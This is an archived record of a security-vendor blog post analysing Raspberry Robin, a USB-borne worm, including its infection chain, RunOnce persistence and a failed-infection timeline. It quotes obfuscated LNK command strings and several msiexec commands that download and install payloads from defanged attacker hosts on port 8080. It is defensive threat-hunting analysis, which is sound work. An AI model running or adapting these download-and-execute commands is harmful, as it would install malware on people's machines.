{
	"id": "6bc9f53f-0550-4d9f-bcb2-baffebc8df19",
	"created_at": "2026-04-10T03:21:28.734183Z",
	"updated_at": "2026-04-10T03:22:17.479111Z",
	"deleted_at": null,
	"sha1_hash": "742e474d94551edc1410b7ceefa024ca2a8964c4",
	"title": "Evolution of USB-Borne Malware, Raspberry Robin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 785847,
	"plain_text": "Evolution of USB-Borne Malware, Raspberry Robin\r\nBy Harlan Carvey\r\nPublished: 2023-09-07 · Archived: 2026-04-10 03:00:51 UTC\r\nDue to our extensive and diverse customer base, Huntress “sees” a good bit of the same malicious activity others are seeing,\r\nalbeit often from a slightly different perspective. \r\nOne example of this is, not long ago, Huntress analysts investigated an INC ransom group incident, one that at the time had\r\nonly been recently observed by others. In other cases, Huntress analysts may observe elements of attacks or campaigns that\r\nare slightly different from what other, similar firms may experience.\r\nSince July 2022, Huntress has observed the USB device-borne Raspberry Robin malware across our customer base off and\r\non. In that time, we’ve seen different variations, as well as an evolution of the response to the malware. While there has been\r\nno regular cadence of infections, it’s clear that a combination of human-managed EDR and human-managed antivirus\r\nprovides a great deal of detection and response capabilities in the face of such infections.\r\nWhat Is Raspberry Robin?\r\nRaspberry Robin is malware that has been described as a “USB worm”, as USB devices are the primary delivery mechanism\r\nthat has been observed to this point. Users interact with a file on a USB device, and then their system becomes infected with\r\nthe Raspberry Robin malware. \r\nRaspberry Robin has been seen to be part of a much larger malware ecosystem and acts as a possible precursor to additional\r\nransomware deployment. However, unlike other worms out there, this malware has not been observed propagating to other\r\nendpoints on its own.\r\nhttps://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nPage 1 of 4\n\nRaspberry Robin Infection Chain\r\nThe typical Raspberry Robin infection chain follows what has previously been shared; the user connects the infected USB\r\ndevice and double-clicks the Windows shortcut/LNK file, causing an apparent “junk” file containing an MSIExec command\r\nto be launched. \r\nHuntress analysts have observed several variations of commands embedded within Windows shortcut/LNK files, including:\r\ntYPeWycz.Cfg|CMDcMd\u003cxPhfk.sav!ComSpEc!\u003cxnjhM.v!coMSPEc!\u003cFN.iCo\r\nThese commands redirect or “pipe” the contents of the “junk” files into the command processor, denoted by either “cmd” or\r\n“!comspec!”. More recently, Huntress observed a command line that contained a significant amount of ‘white space’ with\r\nthe command line itself; that is to say, there were a number of carriage returns and tab characters included in the command\r\nline, likely in an attempt to evade detection.\r\nThe user double-clicking the Windows shortcut/LNK file has been observed within EDR telemetry as an Explorer.exe\r\nprocess associated with the name of the shortcut file:\r\nEXPLORER \"USB DISK\"EXPLORER \"USB DRIVE\"expLorER \"ADATA UFD\"EXPlOrEr \"HBCD 15_2\"\r\nWhen the “junk” file is processed by the command processor, a Microsoft Installer Executable (MSIExec) command is\r\nlaunched, which downloads a remote file to the endpoint. \r\nHuntress has observed a number of similarities in these commands, and in particular, the remote resources accessed via the\r\ncommand. For example, as with previous commands in the infection process, the command itself is of mixed case,\r\nalternating between upper- and lower-case letters. The domain accessed for the resource is most often three characters long,\r\nand the top-level domain is two characters. Finally, the port accessed has been 8080. Examples of commands observed by\r\nHuntress analysts are as follows:\r\nmsiexec.exe -qUIeT /I HTtp://5g7[.]AT:8080/y8yNq/iZR/whjn/Ax6q80a/Y1Z5/j/fs/VTSAO?xxxx \u003credacted\u003e\r\nFUBb=jxbCAQtnu\"msIeXeC YliNpQ=YgYdWQ /q VZFfOPaC=gwiIp jE=jnlD -fV\r\n\"hTtP://FxB[.]tw:8080/AMBG/9FlMJgrIkRjJfVw2bWSju/Machine=User\"MsIEXEc HbeLpYii=TPvbe\r\nWyWsZiUBG=mpV /I \"hTTP://eJK[.]bz:8080/BC/A3Y7fxb0oDMXkstfQGYd/Machine?User\" -qUIeT ZS=xKG\r\nKvbzhtp=UpyZqTff vQtPdg=mWbmSIExeC zkrZ=CtX /qN wZd=VgaoYGD /PACKAgE\r\n\"HtTP://jRx[.]fR:8080/yKyC/bSis/yUp0OSNBN0eTTIjpK/Machine=User\" dJYsmgC=pBVHKGG ieJ=SIYm\r\nPm=cdFDvckTmSiexeC\r\n\\tBIQGitHuP=OsdHlvG\\tjYRdyzQwc=Hwr\\t/fV\\t\\\"hTTp://ZjC[.]bz:8080/AoA3LSHNJCaFIM/hMgkh/62oyni/\u003credacted\u003e\r\nEnksxM=KdVZ vTECB=bHLmevjk -QUIET\\tWx=iY LdP=VEfGlpn\\tMcxWT=zTtlOkU\r\nFinally, persistence is established by creating a value beneath the user’s RunOnce Registry key. As Microsoft stated:\r\nEntries in the RunOnce key delete the registry entry prior to launching the executable content at sign-in. Raspberry Robin\r\nre-adds this key once it is successfully running to ensure persistence. After the initial infection, this leads to RunOnce.exe\r\nlaunching the malware payload in timelines. Raspberry Robin also temporarily renames the RunOnce key when writing to it\r\nto evade detections.\r\nAs a result, the malware persists by recreating a value beneath the user’s RunOnce Registry key each time the value is\r\nremoved from the key and executed.\r\nHunting for Raspberry Robin\r\nhttps://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nPage 2 of 4\n\nDuring August 2023, Huntress analysts observed a Raspberry Robin infection attempt—one that failed to complete.\r\nNotification of the infection attempt was observed via detections based on Huntress EDR telemetry and Managed Microsoft\r\nDefender alerts. The following table illustrates a timeline excerpt of the events as the infection attempt unfolded:\r\n12:20:32Z\r\nUser connects “USB Disk 3.0” device “USB\\VID_13FE\u0026PID_6300\\070393698CF56A96” to the endpoint; a lookup\r\nidentifies this device as a Phison Electronics Corp device, SN: 070393698CF56A96\r\n12:21:12Z\r\nUser double-clicks “USB DISK.lnk”, launches “cmd /C!coMSPEc!\u003cFN.iCo”, which runs msiexec.exe (in this case,\r\n“mSiexeC”) to download and install a file from http://ZjC[.]bz:8080. Huntress detected the Raspberry Robin execution\r\npattern.\r\n12:23:06Z\r\nWindows Defender detects downloaded file “C:\\ProgramData\\Rmbizw\\felgs.evmg” and submits it to the Defender cloud. \r\n12:24:06Z\r\nWindows Defender detects the submitted file as “Trojan:Win32/Wacatac.H!ml”, with persistence established via the user’s\r\nRunOnce Registry key. The file is successfully removed.\r\n12:26:26Z\r\nMsiInstaller process fails; message, “WhOYztO -- Installation failed.”\r\nAt the time of the Huntress investigation of the Raspberry Robin execution pattern detection, the\r\n“C:\\ProgramData\\Rmbizw\\felgs.evmg” file was not found on the endpoint. Further, there was no indication of\r\nRunOnce.exe executing the malware observed within the EDR telemetry for the endpoint.\r\nData from the endpoint Windows Event Logs indicates that the USB device in question was connected to the endpoint\r\nrepeatedly during January 2023, the earliest observed time being on January 6, 2023. Each time the device was connected to\r\nthe endpoint, Windows Defender detected the file “D:\\USB DISK.lnk” as “Trojan:Win32/VintageDynamo.A”. The\r\nearliest available MsiInstaller message within the Windows Event Log data timeline is from March 28, 2022, which\r\nsignificantly pre-dates the January 6, 2023 connection of the “USB Disk 3.0” device; however, there are no MsiInstaller\r\nevents associated with a Raspberry Robin infection attempt until August 21, 2023. This likely indicates that the USB device\r\nwas infected prior to January 6, 2023, and supports the understanding that the user must double-click the Raspberry Robin\r\nWindows shortcut file on the USB device to activate the infection.\r\nConclusion\r\nhttps://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nPage 3 of 4\n\nHuntress Managed EDR and Managed Microsoft Defender work together to provide overlapping layers of endpoint\r\nprotection. Applying a combination of Managed EDR and Managed Microsoft Defender enables both active defense against\r\nthreats as they take place and visibility over how these threats appear.\r\nAs shown in the above example, pivoting from Managed AV detections can reveal an infection chain, highlighting other\r\ntouchpoints for analysts to look for in the event Managed AV fails in the future. Through continuous analysis and review of\r\nalerting, and digging into the context surrounding a given alarm when it fires, network defenders can gain greater\r\nperspective and awareness of how events take place and what additional mitigations or similar should be applied to ensure\r\nacross-the-board coverage against adaptive, persistent threats.\r\nSource: https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nhttps://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin"
	],
	"report_names": [
		"evolution-of-usb-borne-malware-raspberry-robin"
	],
	"threat_actors": [],
	"ts_created_at": 1775791288,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.pdf",
		"text": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.txt",
		"img": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.jpg"
	}
}